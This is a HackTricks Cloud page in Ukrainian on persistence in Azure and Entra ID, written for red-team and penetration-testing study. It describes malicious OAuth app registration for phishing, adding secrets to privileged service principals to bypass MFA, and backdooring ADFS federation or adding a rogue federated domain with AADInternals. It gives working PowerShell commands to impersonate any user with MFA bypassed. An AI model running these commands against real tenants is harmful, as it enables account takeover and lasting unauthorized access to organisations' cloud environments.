HackTricks CloudAz - Persistence
Reading time: 3 minutes
tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримка HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.
OAuth Application
За замовчуванням будь-який користувач може зареєструвати додаток в Entra ID. Тому ви можете зареєструвати додаток (тільки для цільового орендаря), який потребує дозволів з високим впливом з адміністративним погодженням (схвалити його, якщо ви адміністратор) - наприклад, надсилання електронної пошти від імені користувача, управління ролями тощо. Це дозволить нам виконувати фішингові атаки, які будуть дуже прибутковими у разі успіху.
Більше того, ви також можете прийняти цей додаток зі своїм користувачем як спосіб підтримувати доступ до нього.
Applications and Service Principals
З привілеями адміністратора додатків, GA або користувацькою роллю з дозволами microsoft.directory/applications/credentials/update, ми можемо додати облікові дані (секрет або сертифікат) до існуючого додатку.
Можливо націлити додаток з високими дозволами або додати новий додаток з високими дозволами.
Цікавою роллю, яку можна додати до додатку, була б роль адміністратора привілейованої аутентифікації, оскільки вона дозволяє скидати пароль глобальних адміністраторів.
Ця техніка також дозволяє обійти MFA.
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
- Для аутентифікації на основі сертифікатів
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
Federation - Token Signing Certificate
З привілеями DA на локальному AD можливо створити та імпортувати нові сертифікати підпису токенів та сертифікати розшифровки токенів, які мають дуже тривалий термін дії. Це дозволить нам увійти як будь-який користувач, чий ImuutableID ми знаємо.
Виконайте нижче наведений команду як DA на сервері(ах) ADFS, щоб створити нові сертифікати (за замовчуванням пароль 'AADInternals'), додати їх до ADFS, вимкнути автоматичне оновлення та перезапустити службу:
New-AADIntADFSSelfSignedCertificates
Тоді оновіть інформацію про сертифікат з Azure AD:
Update-AADIntADFSFederationSettings -Domain cyberranges.io
Федерація - Довірений домен
З привілеями GA на орендарі можливо додати новий домен (повинен бути перевірений), налаштувати його тип аутентифікації на Федеративний та налаштувати домен для довіри до конкретного сертифіката (any.sts у наведеній нижче команді) та видавця:
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
Посилання
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Підтримка HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.